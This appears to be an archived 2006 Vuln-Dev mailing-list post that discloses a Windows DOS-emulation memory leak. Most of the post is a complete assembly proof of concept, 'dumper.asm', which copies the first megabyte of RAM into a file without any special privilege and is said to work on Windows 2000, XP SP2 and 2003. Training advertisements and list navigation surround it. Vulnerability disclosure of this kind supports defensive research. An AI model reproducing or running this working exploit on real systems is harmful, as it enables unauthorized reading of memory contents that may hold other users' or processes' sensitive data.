Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Windows mem leakage

from [endrazine] Network Security [Permanent Link]
Subject: Windows mem leakage
Date: Tue, 24 Jan 2006 04:01:53 -0800 (PST) 
Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no
particular privilege).

Tested under : Win 2000, XP SP2, 2003

Code :

;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 Mo of memory under any MS product
; 1 Mo is the maximum quantity of accessible memory
; in real mode using 16b OSes.
;
; endrazine, last update : 30/12/2005
;
;-------------------------------------------------------------------------

code segment
        org 100h
        assume ds:code, es:code, cs:code


        xor ax,ax
        mov si,ax

start:
        mov ah, 09h
        mov dx,offset welcome
        int 21h

        xor ax,ax              ;Wait until key pressed
        int 16h


        mov ah, 3ch                 ; MS DOS Create file Function
        mov dx, offset fname
        xor cx,cx
        int 21h


        mov ax, 3d01h               ; MS DOS Open file Function
        int 21h
        mov handle,ax


        xor ax,ax
        mov ds,ax
        mov myds,ds
        mov cx,32

dabigloop:
        push cx

        xor ax,ax
        mov si,ax

        ;==destination==
        mov di,offset buffer
        mov es,cs

        ;==compteur==
        mov cx,16384

        ;==copy==
        rep movsw

        mov ds,cs

        xor ax,ax
        mov ah, 40h
        mov bx,handle
        mov cx,32768; +10
        mov dx, offset buffer
        int 21h

        mov ax,myds
;add ax,2047 ;repeat last 16b
        add ax,2048
        mov myds,ax
        mov ds,ax

        pop cx

        loop dabigloop

        mov ax,4ch                  ; Quit
        int 21h


myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',10,13
        db '',10,13
        db '[ coded by endrazine ]',10,13
        db '',10,13
        db '[ Dumping First Memory chunk to Dump.txt ]',10,13
        db 'Press any key$',10,13
fname db 'Dump.txt',0
buffer db 32768 dup ?
some_canari_separator db '//////////',0
end start

end


;------------------------------------------------------------------------



Endrazine-
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Windows mem leakage, endrazine <=
Previous by Date:  [Full-disclosure] [ GLSA 200601-13 ] Gallery: Cross-site scripting vulnerability, Stefan Cornelius
Next by Date:  [eVuln] "my little homepage" products [link] BBCode XSS Vulnerability, alex
Previous by Thread:  [Full-disclosure] [ GLSA 200601-13 ] Gallery: Cross-site scripting vulnerability, Stefan Cornelius
Next by Thread:  [eVuln] "my little homepage" products [link] BBCode XSS Vulnerability, alex
Indexes:  [Date] [Thread] [Top] [All Lists]